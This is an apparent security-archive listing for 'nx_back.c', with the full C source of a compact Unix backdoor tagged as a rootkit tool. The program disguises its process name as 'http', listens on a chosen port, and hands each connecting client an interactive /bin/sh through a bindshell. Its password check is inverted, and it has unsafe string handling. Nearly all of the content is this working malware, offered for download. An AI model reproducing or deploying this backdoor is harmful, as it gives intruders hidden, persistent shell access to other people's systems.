what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

nx_back.c

nx_back.c
Posted Sep 10, 2004
Authored by nitr0x | Site nitrox.xt.pl

Simple unix-based backdoor that is very compact and provides a bindshell.

tags | tool, rootkit
systems | unix
SHA-256 | d2da29c47b3ffc365cc6f096647ffb62a5dbc2a4f8fd08c29068fed3eb20d0c9
Download | Favorite | View

nx_back.c

Change Mirror Download
/* 
   Another simple backdoor
    +hidden process name
    +password
    +interacive port choice
   www.nitrox.xt.pl
*/ 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <errno.h>

#define PASS "back"
#define BACKLOG 2
#define FAKE "http"
#define WELCOME "Welcome to: "

int main(int argc, char **argv)
{
 int PORT;
 int my_sock, other_sock;
 int so_sock;
 int opt = 1;
 int i,x;
 char buffer[81];
 char localaddr[81];
 struct sockaddr_in my;
 struct sockaddr_in other;
  if (argc<2)
   exit(printf("Use: %s <port>\n",argv[0]));
  if ((atoi(argv[1]))>999999999)
   exit(printf("Bad port value [port<=999999999]\n"));
 PORT=atoi(argv[1]);
 my.sin_family = PF_INET;
 my.sin_port = htons(PORT);
 my.sin_addr.s_addr = INADDR_ANY;
 bzero(&(my.sin_zero),8);
 
 daemon();
 strcpy(argv[0],"               "); 
 strcpy(argv[0],FAKE);
 
 if((my_sock=socket(PF_INET,SOCK_STREAM,0)) < 0) {
  perror("--Socket error");
  exit(1);
 }
 if(bind(my_sock,(struct sockaddr *)&my,sizeof(my))<0) {
  perror("--Bind error");
  exit(1);
 }
 if(setsockopt(my_sock,SOL_SOCKET,SO_REUSEADDR,&opt,sizeof(opt))<0) {
  perror("--Set Socket error");
  exit(1);
 }
 if((listen(my_sock,BACKLOG))<0) {
  perror("--Listen Error");
  exit(1);
 }
 so_sock=sizeof(struct sockaddr_in);
  while(1)
  {
    if((other_sock=accept(my_sock,(struct sockaddr *)&other,&so_sock))<0) {
     perror("--Accept error");
     continue;
    }
   //printf("Got connection from: %s\n", inet_ntoa(other.sin_addr));
   strcat(localaddr,WELCOME);
   strcat(localaddr,inet_ntoa(my.sin_addr));
   strcat(localaddr,"\n");
   if (!fork()) {
    bzero (buffer, sizeof (buffer));
    recv(other_sock, buffer, sizeof (buffer), 0);
    if(!strcmp(PASS,buffer)) 
     exit(0);
     send(other_sock,"www.nitrox.xt.pl\n",18,0); 
     send(other_sock,localaddr,(strlen(localaddr)+1),0);
     send(other_sock,"Executing system shell... [/bin/sh -i]\n",40,0);
     dup2(other_sock,0);
     dup2(other_sock,1); 
     dup2(other_sock,2); 
     execl("/bin/sh","sh","-i");
     exit(0); 
   }
   close(other_sock);
  } 
 return 0;
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close